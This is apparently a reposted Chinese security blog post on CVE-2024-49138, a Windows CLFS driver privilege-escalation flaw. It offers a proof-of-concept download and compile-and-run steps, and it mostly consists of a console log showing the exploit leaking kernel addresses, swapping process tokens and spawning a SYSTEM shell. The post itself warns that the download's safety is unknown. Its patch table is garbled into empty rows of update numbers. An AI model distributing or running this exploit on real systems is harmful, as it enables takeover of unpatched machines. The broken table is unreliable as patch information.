CVE-2024-49138简介
Windows 通用日志文件系统驱动程序特权提升漏洞。
CrowdStrike 检测到威胁行为者积极利用该漏洞。
CVE-2024-49138 POC exp下载地址
CVE-2024-49138-POC.zip
测试
在Windows 11 23h2上测试成功。
编译并运行
编译 x64 发布版本。
运行并获取系统shell。
PS C:UsersIEUserDesktop> whoami
windows11ieuser
PS C:UsersIEUserDesktop> .CVE-2024-49138-POC.exe
Directory created successfully: C:temp
Directory created successfully: C:temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority setto REALTIME_PRIORITY_CLASS.
Thread priority setto the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed witherror6601
Process priority setto NORMAL_PRIORITY_CLASS.
Thread priority setto the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.
C:UsersIEUserDesktop>whoami
nt authoritysystem
C:UsersIEUserDesktop>漏洞影响范围及补丁下载链接
| 发布日期 | 受影响的产品 | 影响 | 最高严重性 | 文章 | 补丁下载 | 构建编号 |
|
|
|
|
|
5048695 | Monthly Rollup |
|
|
|
|
|
|
5048676 | Security Only |
|
|
|
|
|
|
5048710 | Monthly Rollup |
|
|
|
|
|
|
5048744 | Security Only |
|
|
|
|
|
|
5048710 | Monthly Rollup |
|
|
|
|
|
|
5048744 | Security Only |
|
|
|
|
|
|
5048710 | Monthly Rollup |
|
|
|
|
|
|
5048744 | Security Only |
|
|
|
|
|
|
5048710 | Monthly Rollup |
|
|
|
|
|
|
5048744 | Security Only |
|
|
|
|
|
|
5048671 | Security Update |
|
|
|
|
|
|
5048671 | Security Update |
|
|
|
|
|
|
5048671 | Security Update |
|
|
|
|
|
|
5048671 | Security Update |
|
|
|
|
|
|
5048703 | Security Update |
|
|
|
|
|
|
5048703 | Security Update |
|
|
|
|
|
|
5048667 | Security Update |
|
|
|
|
|
|
5048794 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048667 | Security Update |
|
|
|
|
|
|
5048794 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048667 | Security Update |
|
|
|
|
|
|
5048794 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048653 | Security Update |
|
|
|
|
|
|
5048685 | Security Update |
|
|
|
|
|
|
5048685 | Security Update |
|
|
|
|
|
|
5048667 | Security Update |
|
|
|
|
|
|
5048794 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048685 | Security Update |
|
|
|
|
|
|
5048685 | Security Update |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048652 | Security Update |
|
|
|
|
|
|
5048654 | Security Update |
|
|
|
|
|
|
5048800 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048654 | Security Update |
|
|
|
|
|
|
5048800 | SecurityHotpatchUpdate |
|
|
|
|
|
|
5048661 | Security Update |
|
|
|
|
|
|
5048661 | Security Update |
|
|
|
|
|
|
5048661 | Security Update |
|
|
|
|
|
|
5048661 | Security Update |
|
|
|
|
|
|
5048735 | Monthly Rollup |
|
|
|
|
|
|
5048735 | Monthly Rollup |
|
|
|
|
|
|
5048699 | Monthly Rollup |
|
|
|
|
|
|
5048699 | Monthly Rollup |
|
|
|
|
|
|
5048695 | Monthly Rollup |
|
|
|
|
|
|
5048676 | Security Only |
|
注意事项
文件安全性未知,请放虚拟机运行。
原文始发于微信公众号(云梦安全):CVE-2024-49138 poc windows CLFS.sys提权漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论